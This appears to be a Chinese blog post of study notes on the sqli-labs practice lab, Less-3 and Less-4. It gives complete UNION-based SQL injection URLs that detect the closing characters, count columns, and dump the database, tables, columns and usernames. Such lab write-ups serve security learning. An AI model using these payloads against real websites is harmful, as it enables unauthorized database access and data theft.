sqli-labs靶场3~4笔记

Less-3

1.测试是否存在注入点:

复制代码
http://sqli-labs/Less-3/?id=1'

可以看出是单引号+小括号闭合。

复制代码
http://sqli-labs/Less-3/?id=1')--+

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-3/?id=') union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-3/?id=') union select 1,2,database()--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(username) from security.users --+

Less-4

1.测试是否存在注入点:

是双引号+小括号闭合

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(username) from security.users --+

总结

前两关的差别也是注入类型的区别,Less-3是单引号+小括号型,Less-4是双引号+小括号型。

相关推荐
西岸行者3 天前
学习笔记:SKILLS 能帮助更好的vibe coding
笔记·学习
starlaky3 天前
Django入门笔记
笔记·django
勇气要爆发3 天前
吴恩达《LangChain LLM 应用开发精读笔记》1-Introduction_介绍
笔记·langchain·吴恩达
悠哉悠哉愿意3 天前
【单片机学习笔记】串口、超声波、NE555的同时使用
笔记·单片机·学习
勇气要爆发3 天前
吴恩达《LangChain LLM 应用开发精读笔记》2-Models, Prompts and Parsers 模型、提示和解析器
android·笔记·langchain
qianshanxue113 天前
计算机操作的一些笔记标题
笔记
土拨鼠烧电路3 天前
笔记11:数据中台:不是数据仓库,是业务能力复用的引擎
数据仓库·笔记
土拨鼠烧电路3 天前
笔记14:集成与架构:连接孤岛,构建敏捷响应能力
笔记·架构
烟花落o3 天前
栈和队列的知识点及代码
开发语言·数据结构·笔记·栈和队列·编程学习